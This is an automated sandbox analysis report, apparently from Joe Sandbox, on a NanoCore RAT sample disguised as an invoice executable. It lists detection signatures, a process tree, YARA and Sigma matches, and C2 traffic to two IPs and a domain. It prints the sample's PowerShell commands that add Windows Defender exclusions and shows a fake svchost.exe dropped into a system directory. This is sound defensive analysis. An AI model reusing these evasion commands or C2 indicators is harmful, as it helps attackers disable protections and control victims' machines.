Analysis Report CN-Invoice-XXXXX9808-19011143287994.exe

Overview

General Information

Sample Name: CN-Invoice-XXXXX9808-19011143287994.exe
Analysis ID: 358392
MD5: a0f103f98ede4da72e178ee05dabe1e1
SHA1: 320dea63289cad5685cfba395d673142f85fc6ff
SHA256: 6e67b342328c550bead9bf5a953abbb12085aedb4a7a625c242b5474e71a5db8
Tags: NanoCore

Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Nanocore Rat
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
System process connects to network (likely due to code injection or exploit)
Yara detected Nanocore RAT
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Binary contains a suspicious time stamp
Contains functionality to hide a thread from the debugger
Creates an autostart registry key pointing to binary in C:\Windows
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Executable has a suspicious name (potential lure to open the executable)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Suspicious Svchost Process
Sigma detected: System File Execution Location Anomaly
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Startup

  • System is w10x64
  • CN-Invoice-XXXXX9808-19011143287994.exe (PID: 2016 cmdline: 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe' MD5: A0F103F98EDE4DA72E178EE05DABE1E1)
    • powershell.exe (PID: 1472 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • AdvancedRun.exe (PID: 5008 cmdline: 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 4824 cmdline: 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /SpecialRun 4101d8 5008 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 3400 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5856 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 816 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • CasPol.exe (PID: 4228 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
    • WerFault.exe (PID: 6252 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 2180 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • explorer.exe (PID: 4792 cmdline: 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 4424 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • svchost.exe (PID: 4184 cmdline: 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' MD5: A0F103F98EDE4DA72E178EE05DABE1E1)
      • powershell.exe (PID: 6776 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • AdvancedRun.exe (PID: 6980 cmdline: 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
        • AdvancedRun.exe (PID: 6336 cmdline: 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe' /SpecialRun 4101d8 6980 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • powershell.exe (PID: 5588 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 5600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 5604 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • timeout.exe (PID: 5820 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • svchost.exe (PID: 6176 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 6216 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2016 -ip 2016 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • explorer.exe (PID: 6224 cmdline: 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 6292 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • svchost.exe (PID: 6408 cmdline: 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' MD5: A0F103F98EDE4DA72E178EE05DABE1E1)
      • powershell.exe (PID: 4732 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 3912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • AdvancedRun.exe (PID: 6264 cmdline: 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source: 0000000D.00000002.939634194.0000000002AF1000.00000004.00000001.sdmp, Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Author: Joe Security
Source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Author: Florian Roth
  • 0xff8d:$x1: NanoCore.ClientPluginHost
  • 0xffca:$x2: IClientNetworkHost
  • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Author: Joe Security
Source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, Rule: NanoCore, Description: unknown, Author: Kevin Breen <kevin@techanarchy.net>
  • 0xfcf5:$a: NanoCore
  • 0xfd05:$a: NanoCore
  • 0xff39:$a: NanoCore
  • 0xff4d:$a: NanoCore
  • 0xff8d:$a: NanoCore
  • 0xfd54:$b: ClientPlugin
  • 0xff56:$b: ClientPlugin
  • 0xff96:$b: ClientPlugin
  • 0xfe7b:$c: ProjectData
  • 0x10882:$d: DESCrypto
  • 0x1824e:$e: KeepAlive
  • 0x1623c:$g: LogClientMessage
  • 0x12437:$i: get_Connected
  • 0x10bb8:$j: #=q
  • 0x10be8:$j: #=q
  • 0x10c04:$j: #=q
  • 0x10c34:$j: #=q
  • 0x10c50:$j: #=q
  • 0x10c6c:$j: #=q
  • 0x10c9c:$j: #=q
  • 0x10cb8:$j: #=q
Source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Author: Florian Roth
  • 0x1045d:$x1: NanoCore.ClientPluginHost
  • 0x4327d:$x1: NanoCore.ClientPluginHost
  • 0x75e9d:$x1: NanoCore.ClientPluginHost
  • 0x1049a:$x2: IClientNetworkHost
  • 0x432ba:$x2: IClientNetworkHost
  • 0x75eda:$x2: IClientNetworkHost
  • 0x13fcd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
  • 0x46ded:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
  • 0x79a0d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe

Unpacked PEs

Source: 13.2.CasPol.exe.3b3ff84.2.raw.unpack, Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Author: Florian Roth
  • 0xf7ad:$x1: NanoCore.ClientPluginHost
  • 0x28279:$x1: NanoCore.ClientPluginHost
  • 0xf7da:$x2: IClientNetworkHost
  • 0x282a6:$x2: IClientNetworkHost
Source: 13.2.CasPol.exe.3b3ff84.2.raw.unpack, Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Author: Florian Roth
  • 0xf7ad:$x2: NanoCore.ClientPluginHost
  • 0x28279:$x2: NanoCore.ClientPluginHost
  • 0x10888:$s4: PipeCreated
  • 0x29354:$s4: PipeCreated
  • 0xf7c7:$s5: IClientLoggingHost
  • 0x28293:$s5: IClientLoggingHost
Source: 13.2.CasPol.exe.3b3ff84.2.raw.unpack, Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Author: Joe Security
Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Author: Florian Roth
  • 0xe38d:$x1: NanoCore.ClientPluginHost
  • 0xe3ca:$x2: IClientNetworkHost
  • 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Author: Florian Roth
  • 0xe105:$x1: NanoCore Client.exe
  • 0xe38d:$x2: NanoCore.ClientPluginHost
  • 0xf9c6:$s1: PluginCommand
  • 0xf9ba:$s2: FileCommand
  • 0x1086b:$s3: PipeExists
  • 0x16622:$s4: PipeCreated
  • 0xe3b7:$s5: IClientLoggingHost

Sigma Overview

System Summary:

Sigma detected: NanoCore
Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 4228, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
Sigma detected: Suspicious Svchost Process
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' , CommandLine: 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4424, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' , ProcessId: 4184
Sigma detected: System File Execution Location Anomaly
Source: Process started, Author: Florian Roth, Patrick Bareiss, Data: Command: 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' , CommandLine: 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4424, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' , ProcessId: 4184
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process started, Author: vburov, Data: Command: 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' , CommandLine: 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4424, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' , ProcessId: 4184

Signature Overview

AV Detection:

Multi AV Scanner detection for domain / URL
Source: coroloboxorozor.com, Virustotal: Detection: 15%
Multi AV Scanner detection for dropped file
Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe, ReversingLabs: Detection: 27%
Multi AV Scanner detection for submitted file
Source: CN-Invoice-XXXXX9808-19011143287994.exe, Virustotal: Detection: 29%
Source: CN-Invoice-XXXXX9808-19011143287994.exe, ReversingLabs: Detection: 27%
Yara detected Nanocore RAT
Machine Learning detection for dropped file
Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe, Joe Sandbox ML: detected
Machine Learning detection for sample
Source: CN-Invoice-XXXXX9808-19011143287994.exe, Joe Sandbox ML: detected
Source: 13.2.CasPol.exe.51c0000.7.unpack, Avira: Label: TR/NanoCore.fadte

Compliance:

Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: CN-Invoice-XXXXX9808-19011143287994.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
        Source: Binary string: shcore.pdb= source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: rsaenh.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.981409215.0000000009040000.00000004.00000001.sdmp
        Source: Binary string: .pdb>X source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.849394343.0000000000F89000.00000004.00000010.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbR source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854230028.000000000123D000.00000004.00000020.sdmp
        Source: Binary string: System.ni.pdb% source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854230028.000000000123D000.00000004.00000020.sdmp
        Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000011.00000003.773634212.0000000004AC0000.00000004.00000040.sdmp
        Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: System.Xml.pdb] source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: ml.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: winnsi.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: .ni.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: clr.pdb source: WerFault.exe, 00000011.00000003.773634212.0000000004AC0000.00000004.00000040.sdmp
        Source: Binary string: cryptsp.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Windows.Forms.pdb" source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: advapi32.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: ility.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: urlmon.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: Microsoft.VisualBasic.pdb] source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.PDB source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.849394343.0000000000F89000.00000004.00000010.sdmp
        Source: Binary string: System.Configuration.pdb{ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: ml.pdbe source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: ole32.pdbx source: WerFault.exe, 00000011.00000003.772085355.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000011.00000003.772531708.0000000004AC7000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb&;$ source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854050240.000000000122B000.00000004.00000020.sdmp
        Source: Binary string: System.Xml.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: System.Core.pdb" source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: shell32.pdb{ source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbN source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854230028.000000000123D000.00000004.00000020.sdmp
        Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: wuser32.pdbq source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: mscoree.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: System.Core.pdb, source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: rasapi32.pdbe source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: profapi.pdbc source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854050240.000000000122B000.00000004.00000020.sdmp
        Source: Binary string: shlwapi.pdbk source: WerFault.exe, 00000011.00000003.772531708.0000000004AC7000.00000004.00000040.sdmp
        Source: Binary string: msvcp_win.pdbS source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Configuration.pdb" source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: nsi.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: powrprof.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Configuration.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: ole32.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: wimm32.pdb3 source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: iertutil.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: mscorlib.pdb" source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: msasn1.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.981409215.0000000009040000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: comctl32v582.pdbX source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: cldapi.pdb5 source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: combase.pdb source: WerFault.exe, 00000011.00000003.772531708.0000000004AC7000.00000004.00000040.sdmp
        Source: Binary string: CN-Invoice-XXXXX9808-19011143287994.PDB source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.849394343.0000000000F89000.00000004.00000010.sdmp
        Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854230028.000000000123D000.00000004.00000020.sdmp
        Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, AdvancedRun.exe, 00000003.00000000.674869735.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmp
        Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.981409215.0000000009040000.00000004.00000001.sdmp
        Source: Binary string: npNiVisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.849394343.0000000000F89000.00000004.00000010.sdmp
        Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854230028.000000000123D000.00000004.00000020.sdmp
        Source: global traffic TCP traffic: 192.168.2.4:49730 -> 185.157.161.86:50005
        Source: global traffic TCP traffic: 192.168.2.4:49742 -> 157.97.120.21:50005
        Source: global traffic HTTP traffic detected: GET /base/F5B9A7CB87ADE6C09DC3687F02604706.html HTTP/1.1 Host: coroloboxorozor.com Connection: Keep-Alive
        Source: global traffic HTTP traffic detected: GET /base/7A885C86AF3E7CAEF5D9FC154830C30E.html HTTP/1.1 Host: coroloboxorozor.com
